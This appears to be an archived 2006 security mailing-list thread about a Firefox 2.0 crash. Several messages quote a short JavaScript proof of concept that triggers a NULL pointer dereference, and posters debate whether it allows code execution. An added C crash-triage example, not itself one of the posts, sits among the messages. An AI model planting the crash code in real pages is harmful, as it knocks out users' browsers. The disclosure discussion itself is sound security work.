Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-27 Thread sflist
Also crashes Seamonkey 1.1b on Suse 10.1

>
>
> New Flaw in Firefox 2.0: DoS and possible remote code execution
>
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
>
>
> function do_crash()
> {
> var range;
>
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
>
> Good bye Firefox!
>


-- 
"Ein Herz für Kinder" - your donation helps! Campaign: www.deutschlandsegelt.de
Our thank-you: your name on the sail of the first German America's Cup yacht!


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jan Heisterkamp

[EMAIL PROTECTED] wrote:

New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}



Good bye Firefox!



  

Hi!
That also works under Firefox v1.5.0.7.
Regards,
Jan


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-06 Thread Jerome Athias

3APA3A wrote:

Dear [EMAIL PROTECTED],

NULL pointer dereference is not exploitable to code execution by itself.

  

Hi,

you should be interested by this
http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

+ a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar

/JA



Re[2]: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-03 Thread 3APA3A
Dear Jerome Athias,

I said a NULL pointer is not exploitable _by itself_. The ability to control
the unhandled exception filter is a different vulnerability. The NULL pointer
in this case is not the exploitation vector; it is only used to initiate the attack.

--Thursday, November 2, 2006, 10:01:19 PM, you wrote to [EMAIL PROTECTED]:

JA> 3APA3A wrote:
>> Dear [EMAIL PROTECTED],
>>
>> NULL pointer dereference is not exploitable to code execution by itself.
>>
>>   
JA> Hi,

JA> you should be interested by this
JA> http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html

JA> + a little tool
JA> https://www.securinfos.info/outils-securite-hacking/uSEH.rar

JA> /JA



-- 
~/ZARAZA
Trouble will start at eight. (Twain)



Re[3]: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-01 Thread 3APA3A
Dear [EMAIL PROTECTED],

A NULL pointer dereference is not exploitable to code execution by itself.
Please read carefully Michal Zalewski's original post on the issue you are
pointing to:
http://securitytracker.com/alerts/2006/Apr/1016001.html

The issue mentioned is not a NULL pointer, but a NULL+offset dereference where
the offset is believed to be controlled:

-=-=-=-=- start quote Michal Zalewski =-=-=-=-

...this will (usually) cause a NULL pointer + fixed offset (eax+0x28)
dereference in mshtml.dll, the pointer being read from allocated but still
zeroed memory region.

The aforementioned condition is not exploitable, but padding the page with
preceding OBJECT tag (and other tags), increasing the number of nested
OBJECTs, and most importantly, adding bogus 'type=' parameters of various
length to the final sequence of OBJECTs, will cause that dereference to
become non-NULL on many installations;

-=-=-=-=-  end quote  =-=-=-=-



--Tuesday, October 31, 2006, 11:00:00 PM, you wrote to 
bugtraq@securityfocus.com:

xgc> When you have a NULL pointer dereference, code execution is
xgc> also possible, so you can't exclude it at all.
xgc> For example in this old flaw:
xgc> http://securitytracker.com/alerts/2006/Apr/1016001.html
xgc> "The browser does not properly process certain combinations
xgc> of nested OBJECT tags. A remote user can create specially crafted
xgc> HTML that, when loaded by the target user, will trigger a NULL
xgc> pointer dereference and cause the target user's browser to crash or
xgc> execute arbitrary code."
 


-- 
~/ZARAZA
http://www.security.nnov.ru/



Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-11-01 Thread Daniel Veditz
[EMAIL PROTECTED] wrote:
> When you have a NULL pointer dereference, code execution is also possible,
> so you can't exclude it at all.
> For example in this old flaw:
> http://securitytracker.com/alerts/2006/Apr/1016001.html

In that example there was a way to influence the crash so that it was not null.
The Metasploit blog previously reported on a way to use a null dereference crash
to trigger a vulnerability in the Windows SEH to run code (since fixed, and not
exploitable via Firefox as far as anyone can tell).

Neither of those conditions applies here; it's just a null dereference. In a debug
build you get

###!!! ASSERTION: Parsing didn't create a parser context?: 'mParserContext',
file c:/dev/ff2/mozilla/parser/htmlparser/src/nsParser.cpp, line 1882

This bug appears to have been fixed in the code that will become Firefox 3. This
crash is being tracked at https://bugzilla.mozilla.org/show_bug.cgi?id=358797
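The disagreement in this thread (3APA3A's NULL versus NULL+controlled-offset distinction, and Daniel Veditz's "it's just a null dereference") comes down to one triage question: where does the faulting access land? The program below is an added crash-triage example, not code from any poster or from Mozilla. It installs a SIGSEGV/SIGBUS handler, reads the faulting address from `siginfo_t`, and classifies it as a plain null-page dereference (denial of service, the address is inside the never-mapped zero page) or as a fault somewhere else that needs closer analysis. The `NULL_PAGE_LIMIT` constant (64 KiB, the usual Linux `vm.mmap_min_addr` default) and the `probe_read` helper are this example's own assumptions; the 0x28 offset is borrowed from the Zalewski quote above to show that NULL+small fixed offset still classifies as a null-page fault.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed: addresses below 64 KiB are never mapped (Linux vm.mmap_min_addr default).
 * A fault inside this range is a pure NULL-page dereference: a crash, nothing more. */
#define NULL_PAGE_LIMIT 0x10000u

enum fault_class {
    FAULT_NONE,      /* the access succeeded */
    FAULT_NULL_PAGE, /* faulting address inside the zero page: DoS-only */
    FAULT_OTHER      /* faulting address elsewhere: needs further triage */
};

static sigjmp_buf recover_point;
static volatile uintptr_t last_fault_addr;

/* Record the faulting address reported by the kernel and unwind back to probe_read. */
static void on_fault(int sig, siginfo_t *info, void *ctx)
{
    (void)sig;
    (void)ctx;
    last_fault_addr = (uintptr_t)info->si_addr;
    siglongjmp(recover_point, 1);
}

/* The triage rule itself: does the faulting address fall in the never-mapped zero page? */
enum fault_class classify_fault(uintptr_t fault_addr)
{
    return fault_addr < NULL_PAGE_LIMIT ? FAULT_NULL_PAGE : FAULT_OTHER;
}

/* Perform one 32-bit read through base+offset under a fault handler and
 * report how the resulting fault (if any) classifies. Hypothetical helper. */
enum fault_class probe_read(uintptr_t base, uintptr_t offset)
{
    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = on_fault;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus); /* some platforms report bad reads as SIGBUS */

    enum fault_class result = FAULT_NONE;
    if (sigsetjmp(recover_point, 1) == 0) {
        /* volatile forces the load to actually happen */
        volatile uint32_t *p = (volatile uint32_t *)(base + offset);
        volatile uint32_t sink = *p;
        (void)sink;
    } else {
        result = classify_fault(last_fault_addr);
    }

    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return result;
}

static const char *describe(enum fault_class c)
{
    switch (c) {
    case FAULT_NONE:      return "no fault";
    case FAULT_NULL_PAGE: return "NULL-page dereference (DoS only)";
    default:              return "fault outside NULL page (triage further)";
    }
}

static uint32_t valid_word = 0x41424344u; /* constructed: a readable global */

int main(void)
{
    /* NULL + 0x28, the eax+0x28 shape from the Zalewski quote */
    printf("NULL+0x28:   %s\n", describe(probe_read(0, 0x28)));
    /* a perfectly valid read for comparison */
    printf("valid word:  %s\n", describe(probe_read((uintptr_t)&valid_word, 0)));
    return 0;
}
```

The interesting line for an analyst is the classification, not the crash: a reproducible fault at NULL plus a small fixed offset, with no attacker influence over that offset, is the situation Veditz describes, and a reviewer should ask for evidence of offset control (as Bressers did) before accepting a "remote code execution" label.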



Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread xxxx
When you have a NULL pointer dereference, code execution is also possible, so
you can't exclude it at all.
For example in this old flaw:
http://securitytracker.com/alerts/2006/Apr/1016001.html
"The browser does not properly process certain combinations of nested OBJECT 
tags. A remote user can create specially crafted HTML that, when loaded by the 
target user, will trigger a NULL pointer dereference and cause the target 
user's browser to crash or execute arbitrary code."
 


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread Josh Bressers
> New Flaw in Firefox 2.0: DoS and possible remote code execution
> 
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
> 

This looks like a NULL pointer dereference in my debugger.  Do you have
evidence to call this remote code execution?

-- 
JB


Re: New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread Gouki
Firefox 1.5.0.7 is also vulnerable (to DoS at least).

On Tue, 2006-10-31 at 09:24 +, [EMAIL PROTECTED] wrote:
> New Flaw in Firefox 2.0: DoS and possible remote code execution
> 
> PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
> 
> 
> 
> 
> 
> function do_crash()
> {
> var range;
> 
> range = document.createRange();
> range.selectNode(document.firstChild);
> range.createContextualFragment('<span></span>');
> }
> 
> 
> 
> Good bye Firefox!
> 
> 




New Flaw in Firefox 2.0: DoS and possible remote code execution

2006-10-31 Thread xxxx
New Flaw in Firefox 2.0: DoS and possible remote code execution

PoC here: http://werterxyz.altervista.org/Firefox2Range.htm





function do_crash()
{
var range;

range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}



Good bye Firefox!